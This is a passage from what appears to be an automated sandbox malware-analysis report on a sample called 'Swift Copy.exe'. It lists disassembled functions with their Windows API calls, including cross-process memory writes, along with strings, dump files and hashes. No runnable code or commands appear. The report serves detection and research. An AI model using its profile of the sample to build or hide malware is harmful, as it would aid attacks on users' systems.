                                              • __Init_thread_footer.LIBCMT ref: 00DF6238
                                                • Part of subcall function 00D901F8: EnterCriticalSection.KERNEL32(00E4070C,?,?,00D88747,00E42514), ref: 00D90202
                                                • Part of subcall function 00D901F8: LeaveCriticalSection.KERNEL32(00E4070C,?,00D88747,00E42514), ref: 00D90235
                                                • Part of subcall function 00DE359C: LoadStringW.USER32(00000066,?,00000FFF,00000000), ref: 00DE35E4
                                                • Part of subcall function 00DE359C: LoadStringW.USER32(00E42390,?,00000FFF,?), ref: 00DE360A
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: CriticalSection$EnterLeaveLoadString$Init_thread_footer__onexit
                                              • String ID: x#$x#$x#
                                              • API String ID: 1072379062-1894725482
                                              • Opcode ID: 3a30b4ded5c5eb2bf3918d7f630de470adfe09c29aa6382da4a63f439d7509e7
                                              • Instruction ID: 1b3d1267dab4b009b227fe4d08b34e1edf8634d5e726aaaa321e33020c911088
                                              • Opcode Fuzzy Hash: 3a30b4ded5c5eb2bf3918d7f630de470adfe09c29aa6382da4a63f439d7509e7
                                              • Instruction Fuzzy Hash: A0C15E71A00109AFCB14EF58D891DBEB7B9EF49300F158069FA55AB291DB70ED45CBB0
                                              APIs
                                                • Part of subcall function 00D90242: EnterCriticalSection.KERNEL32(00E4070C,00E41884,?,?,00D8198B,00E42518,?,?,?,00D712F9,00000000), ref: 00D9024D
                                                • Part of subcall function 00D90242: LeaveCriticalSection.KERNEL32(00E4070C,?,00D8198B,00E42518,?,?,?,00D712F9,00000000), ref: 00D9028A
                                                • Part of subcall function 00D79CB3: _wcslen.LIBCMT ref: 00D79CBD
                                                • Part of subcall function 00D900A3: __onexit.LIBCMT ref: 00D900A9
                                              • __Init_thread_footer.LIBCMT ref: 00DF7BFB
                                                • Part of subcall function 00D901F8: EnterCriticalSection.KERNEL32(00E4070C,?,?,00D88747,00E42514), ref: 00D90202
                                                • Part of subcall function 00D901F8: LeaveCriticalSection.KERNEL32(00E4070C,?,00D88747,00E42514), ref: 00D90235
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit_wcslen
                                              • String ID: 5$G$Variable must be of type 'Object'.
                                              • API String ID: 535116098-3733170431
                                              • Opcode ID: fb76ea1075032c2b8ae8d52f257222cbdefcea676ba44069356bb885f03e9690
                                              • Instruction ID: 0dc6cd768527cc6b6cd2028d63a15cc84f826f80514aa15d7c898734e1a0d0b8
                                              • Opcode Fuzzy Hash: fb76ea1075032c2b8ae8d52f257222cbdefcea676ba44069356bb885f03e9690
                                              • Instruction Fuzzy Hash: 8D917974A04209EFCB04EF54D8919FDB7B1EF49300F558059FA46AB292EB71AE81CB71
                                              APIs
                                                • Part of subcall function 00DDB403: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00DD21D0,?,?,00000034,00000800,?,00000034), ref: 00DDB42D
                                              • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00DD2760
                                                • Part of subcall function 00DDB3CE: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00DD21FF,?,?,00000800,?,00001073,00000000,?,?), ref: 00DDB3F8
                                                • Part of subcall function 00DDB32A: GetWindowThreadProcessId.USER32(?,?), ref: 00DDB355
                                                • Part of subcall function 00DDB32A: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00DD2194,00000034,?,?,00001004,00000000,00000000), ref: 00DDB365
                                                • Part of subcall function 00DDB32A: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00DD2194,00000034,?,?,00001004,00000000,00000000), ref: 00DDB37B
                                              • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00DD27CD
                                              • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00DD281A
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                              • String ID: @
                                              • API String ID: 4150878124-2766056989
                                              • Opcode ID: ba57166e1101fefd9a59682a1dbcfd34862bed014c3cc292fa428072393764ca
                                              • Instruction ID: 7423608a9af96fbfb9606642575d82467e5da14bef601ce50754fb88f1d1a318
                                              • Opcode Fuzzy Hash: ba57166e1101fefd9a59682a1dbcfd34862bed014c3cc292fa428072393764ca
                                              • Instruction Fuzzy Hash: 43413C72900218BEDB10DBA4CC41AEEBBB8EB05714F104056EA55B7281DB716E85DBA1
                                              APIs
                                              • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Swift Copy.exe,00000104), ref: 00DA1769
                                              • _free.LIBCMT ref: 00DA1834
                                              • _free.LIBCMT ref: 00DA183E
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: _free$FileModuleName
                                              • String ID: C:\Users\user\Desktop\Swift Copy.exe
                                              • API String ID: 2506810119-7014349
                                              • Opcode ID: 223fe266accfad9245829b5b911898c59503ba0c17e14df8738736f7fecac2aa
                                              • Instruction ID: b48d844d9962b080cb74f596bbccc3156d276c0ada9b5f7297566f97d465f6ce
                                              • Opcode Fuzzy Hash: 223fe266accfad9245829b5b911898c59503ba0c17e14df8738736f7fecac2aa
                                              • Instruction Fuzzy Hash: A631A279A44218FFCB21DFA99881D9EBBFCEB86310F1441A6F404D7211D6B08E81DBB4
                                              APIs
                                              • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00DDC306
                                              • DeleteMenu.USER32(?,00000007,00000000), ref: 00DDC34C
                                              • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00E41990,00F47290), ref: 00DDC395
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: Menu$Delete$InfoItem
                                              • String ID: 0
                                              • API String ID: 135850232-4108050209
                                              • Opcode ID: 4c150814171d816d23721fc9692c41c191320fa743cf249049f4dc144f784d32
                                              • Instruction ID: a1128744710fdf9dd2bd4cfe9758bee3c89078061ff56f9f447370c6a8629530
                                              • Opcode Fuzzy Hash: 4c150814171d816d23721fc9692c41c191320fa743cf249049f4dc144f784d32
                                              • Instruction Fuzzy Hash: 43418D712143429FDB24DF29D884B1ABBA4EF85320F14961EE9A5973D1D730E904CB72
                                              APIs
                                              • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00E0CC08,00000000,?,?,?,?), ref: 00E044AA
                                              • GetWindowLongW.USER32 ref: 00E044C7
                                              • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00E044D7
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: Window$Long
                                              • String ID: SysTreeView32
                                              • API String ID: 847901565-1698111956
                                              • Opcode ID: a3f5c350bf3f1dfcc55a46c7eafacd0621968ec71677771acebe18e41c645522
                                              • Instruction ID: c0778ae5aed117eddc54bce4f487d6a596ed68914ba3983fc7ebb68c2765c7e7
                                              • Opcode Fuzzy Hash: a3f5c350bf3f1dfcc55a46c7eafacd0621968ec71677771acebe18e41c645522
                                              • Instruction Fuzzy Hash: CE31BEB1200205AFDF219F78DC45BEA7BA9EB08338F205315FA79A21D0D771EC909760
                                              APIs
                                                • Part of subcall function 00DF335B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,00DF3077,?,?), ref: 00DF3378
                                              • inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00DF307A
                                              • _wcslen.LIBCMT ref: 00DF309B
                                              • htons.WSOCK32(00000000,?,?,00000000), ref: 00DF3106
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: ByteCharMultiWide_wcslenhtonsinet_addr
                                              • String ID: 255.255.255.255
                                              • API String ID: 946324512-2422070025
                                              • Opcode ID: dca2ee7920f935db9220182b363a9da53d80ec362acb22a0f7a4b6600ccfd65e
                                              • Instruction ID: bea8db0c56ed2a581259018e6ecea001bb629eb9c60464bd9b0b2aead0aec86c
                                              • Opcode Fuzzy Hash: dca2ee7920f935db9220182b363a9da53d80ec362acb22a0f7a4b6600ccfd65e
                                              • Instruction Fuzzy Hash: 0231A1356002099FCB10CF68C485E7A77E0EF54358F2AC059EA158B392DB72EE45C771
                                              APIs
                                              • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00E04705
                                              • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00E04713
                                              • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00E0471A
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: MessageSend$DestroyWindow
                                              • String ID: msctls_updown32
                                              • API String ID: 4014797782-2298589950
                                              • Opcode ID: 9be9f3c5f78a7675f6ecf10fd568b76740139e29201885b51bfd6db030b4db6e
                                              • Instruction ID: 9003922e39e1373bee823094f6a0a2fd16e0c82aee64eb62e27b4babceb23fd2
                                              • Opcode Fuzzy Hash: 9be9f3c5f78a7675f6ecf10fd568b76740139e29201885b51bfd6db030b4db6e
                                              • Instruction Fuzzy Hash: 852181F5600209AFDB10DF68DD91DA737ADEF9A358B041049F600A72A1DB71EC91CA70
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: _wcslen
                                              • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                              • API String ID: 176396367-2734436370
                                              • Opcode ID: f55c614f1e952a36a19a9a5530c7c5846285ae2adfe1d46f7c5a0924c7c31c1b
                                              • Instruction ID: 299014e1bae53b3164460c929cc915466821e7c03a8983d485557286468557bf
                                              • Opcode Fuzzy Hash: f55c614f1e952a36a19a9a5530c7c5846285ae2adfe1d46f7c5a0924c7c31c1b
                                              • Instruction Fuzzy Hash: FA21383220425166C731BB249C22FBBF398DF51710F184437F94997285EB56ED92C3B5
                                              APIs
                                              • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00E03840
                                              • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00E03850
                                              • MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00E03876
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: MessageSend$MoveWindow
                                              • String ID: Listbox
                                              • API String ID: 3315199576-2633736733
                                              • Opcode ID: 4ce222513808466bc14ee9e0c5e7c29fc506c781124fb3be0bb57001a83669c9
                                              • Instruction ID: a860233e8b4ccff0529386b9d50ee866ea43538fd323a7ed1410828f6ed4ef19
                                              • Opcode Fuzzy Hash: 4ce222513808466bc14ee9e0c5e7c29fc506c781124fb3be0bb57001a83669c9
                                              • Instruction Fuzzy Hash: 5C21DE72600218BFEF218F65CC81EAB376EEF89754F109125F944AB1D0CA72DC9287A0
                                              APIs
                                              • SetErrorMode.KERNEL32(00000001), ref: 00DE4A08
                                              • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00DE4A5C
                                              • SetErrorMode.KERNEL32(00000000,?,?,00E0CC08), ref: 00DE4AD0
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: ErrorMode$InformationVolume
                                              • String ID: %lu
                                              • API String ID: 2507767853-685833217
                                              • Opcode ID: 6bf3051863351303ede7d01abb24a10a72fa6ff57325041a62b834e763270f3e
                                              • Instruction ID: fe454761d0f91dcabbafa25973a397ec7953d06cf720b65b400c348cf94f8a80
                                              • Opcode Fuzzy Hash: 6bf3051863351303ede7d01abb24a10a72fa6ff57325041a62b834e763270f3e
                                              • Instruction Fuzzy Hash: 86315375A00109AFDB10DF55C985EAABBF8EF08318F1480A5F509EB252D771ED45CB71
                                              APIs
                                              • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00E0424F
                                              • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00E04264
                                              • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00E04271
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: MessageSend
                                              • String ID: msctls_trackbar32
                                              • API String ID: 3850602802-1010561917
                                              • Opcode ID: ec0073170520f4eba235556bad8b006d5bc6b6d8167e99021b73c80a95334755
                                              • Instruction ID: 88543b3bf01b5f9afd5948c067ef6d8f63c3d4f9743dc5980743b2bc6eaf11b1
                                              • Opcode Fuzzy Hash: ec0073170520f4eba235556bad8b006d5bc6b6d8167e99021b73c80a95334755
                                              • Instruction Fuzzy Hash: 9E11A3B1340248BEEF205F69CC06FAB3BACEF95B58F111518FA55F60E0D671D8A19B20
                                              APIs
                                                • Part of subcall function 00D76B57: _wcslen.LIBCMT ref: 00D76B6A
                                                • Part of subcall function 00DD2DA7: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00DD2DC5
                                                • Part of subcall function 00DD2DA7: GetWindowThreadProcessId.USER32(?,00000000), ref: 00DD2DD6
                                                • Part of subcall function 00DD2DA7: GetCurrentThreadId.KERNEL32 ref: 00DD2DDD
                                                • Part of subcall function 00DD2DA7: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00DD2DE4
                                              • GetFocus.USER32 ref: 00DD2F78
                                                • Part of subcall function 00DD2DEE: GetParent.USER32(00000000), ref: 00DD2DF9
                                              • GetClassNameW.USER32(?,?,00000100), ref: 00DD2FC3
                                              • EnumChildWindows.USER32(?,00DD303B), ref: 00DD2FEB
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
                                              • String ID: %s%d
                                              • API String ID: 1272988791-1110647743
                                              • Opcode ID: ca1251244f0d00a16864a5bc2dcd564f0a4ec1884fa6138f328a4e7211c012fe
                                              • Instruction ID: cb68c1518a8f41171e7da23e222cbdc3efa276fc8e9a3b32cecef395c3ebb089
                                              • Opcode Fuzzy Hash: ca1251244f0d00a16864a5bc2dcd564f0a4ec1884fa6138f328a4e7211c012fe
                                              • Instruction Fuzzy Hash: E511E4712002056BCF247F709C86EFD376AEFA4304F148076F909AB292EE319A49CB70
                                              APIs
                                              • GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 00E058C1
                                              • SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 00E058EE
                                              • DrawMenuBar.USER32(?), ref: 00E058FD
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
